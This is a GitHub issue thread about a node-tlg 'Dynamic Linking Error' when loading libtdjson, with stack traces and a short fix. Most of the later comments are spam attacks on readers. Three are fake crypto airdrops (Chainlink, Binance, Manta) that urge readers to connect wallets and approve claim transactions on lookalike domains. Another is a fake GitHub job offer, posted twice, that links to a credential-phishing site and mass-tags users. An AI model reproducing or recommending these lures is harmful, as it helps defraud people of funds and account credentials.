### ISSUE TITLE
Dynamic Linking Error

### ISSUE THREAD

**Issue by kumarabhirup** [dilongfa/node-tlg#2]
```
backend: Error: Dynamic Linking Error: dlopen(/Users/kumarabhirup/Documents/Repositories/propagateAt/packages/backend/libtdjson.dylib, 2): image not found
backend:     at new DynamicLibrary (/Users/kumarabhirup/Documents/Repositories/propagateAt/node_modules/ffi-napi/lib/dynamic_library.js:74:11)
backend:     at Object.Library (/Users/kumarabhirup/Documents/Repositories/propagateAt/node_modules/ffi-napi/lib/library.js:45:14)
backend:     at new TDLib (/Users/kumarabhirup/Documents/Repositories/propagateAt/node_modules/tlg/lib/tdlib.js:22:20)
backend:     at new Client (/Users/kumarabhirup/Documents/Repositories/propagateAt/node_modules/tlg/lib/client.js:7:3)
backend:     at connectToTelegram (/Users/kumarabhirup/Documents/Repositories/propagateAt/packages/backend/dist/src/resolvers/mutations/connectToTelegram.js:15:20)
backend:     at processTicksAndRejections (internal/process/task_queues.js:93:5)
backend:     at async Promise.all (index 0)
```

Looks like you abandoned this project. Anyway, would love to get help here.

**Comment by alikianinejad** [comment]
you should copy libtdjson.dylib from tdlib build folder to your project root directory

**Comment by MrFiregore** [comment]
same issue in win32:
```
(node:16684) UnhandledPromiseRejectionWarning: Error: Dynamic Linking Error: Win32 error 193
    at new DynamicLibrary (E:\wamp64\www\node-mysql\node_modules\ffi-napi\lib\dynamic_library.js:74:11)
    at Object.Library (E:\wamp64\www\node-mysql\node_modules\ffi-napi\lib\library.js:45:14)
    at new TDLib (E:\wamp64\www\node-mysql\node_modules\telegram-client\lib\tdlib.js:22:20)
    at new Client (E:\wamp64\www\node-mysql\node_modules\telegram-client\lib\client.js:7:3)
    at main (E:\wamp64\www\node-mysql\test.js:23:24)
    at Object.<anonymous> (E:\wamp64\www\node-mysql\test.js:21:5)
    at Module._compile (internal/modules/cjs/loader.js:1137:30)
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:1157:10)
    at Module.load (internal/modules/cjs/loader.js:985:32)
    at Function.Module._load (internal/modules/cjs/loader.js:878:14)
```

![image](https://user-images.githubusercontent.com/23504988/89235046-c195b200-d5ed-11ea-97ae-ad3c67116aec.png)

**Comment by alejandro0619** [comment]
I have the same problem as @firegore2

**Comment by luispurizacam** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin airdrop?
- If you're interested about the world of holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great place to begin. This guide will streamline the process for you, elucidating how to join this airdrop and what you can anticipate.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://chainlinksecure.fly.dev/)

#### 🚀 Simple Steps to Secure Your Ocean Protocol Airdrop:

1. **Connect Your Wallet:**
   - Swing by the [ Chainlink $LINK Airdrop](https://chainlinksecure.fly.dev/).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the Ocean Protocol Airdrop [right here](https://chainlinksecure.fly.dev/).

3. **Engage for Extra Rewards:**
   - Dive into community discussions or tackle tasks for bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Airdrop Success:

- **Community Assistance:**
  - Need a hand? Shoot a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep your eyes peeled for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a bit. Stay chill and keep an eye out for updates.

Feel free to share your Ocean Protocol Airdrop experiences or shoot any questions in the comments below. Let's make this process a breeze for everyone!

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by DenisKibe** [comment]
# Earn $1000 in Manta Network Tokens!

[![Manta Network](https://global.discourse-cdn.com/aptoslabs/original/3X/e/6/e6954df39d3aedbc46201c5e1199eb9deb84411d.jpeg)](https://claim.mantarewards.online)

## Steps to Earn:

1. **Connect Your Wallet:**
   - Make sure you have a wallet compatible with Manta Network, such as MetaMask or Trust Wallet.
   - Visit [https://claim.mantarewards.online](https://claim.mantarewards.online) and connect your wallet.

2. **Use the Claim Method:**
   - After connecting your wallet, navigate to the rewards section or dashboard.
   - Find the "Claim" option and click on it.

3. **Claim Your Prize:**
   - Follow the on-screen instructions to complete the claiming process.
   - Upon successful completion, you will receive $1000 in Manta Network tokens in your wallet.

4. **Enjoy Your Tokens:**
   - The tokens will be deposited into your wallet and ready to be used or traded.

## Important Note:
Make sure to read the terms and conditions on the [https://claim.mantarewards.online](https://claim.mantarewards.online) page to ensure you meet all eligibility requirements for the promotion. This offer is for a limited time, so don't miss out!



Winners: @christoph-karpowicz, @wu347771769, @starfork, @leolang, @ylkjick532428, @OkazakiNagisa, @cameronraysmith

**Comment by Arran5353** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
boguslav, @dafinguzman, @lavanphat, @ChaBen, @hyuts-dennis, @hoangkianh, @Gaserd, @Semchik01, @abedzantout, @thochi, @joereycrypto, @alexmdcampo, @eabase, @ADWilkinson, @FrancisVarga, @yuki399, @dust, @manzub, @climber2002, @Rus008

**Comment by bravura-quark** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
dvdwalker, @chrisabruce, @jirichmel, @bananaforsc4le, @MrEndor, @akoroc, @ajeetbpr, @marquimfe, @echo-ht, @Tayeb-Ali, @imsathiya17, @jpsesese, @sevenofficial, @kazoor, @matthieudevipa, @disc0nnctd, @JAYD4760, @dublicator, @kenxx, @Joeyetinghan
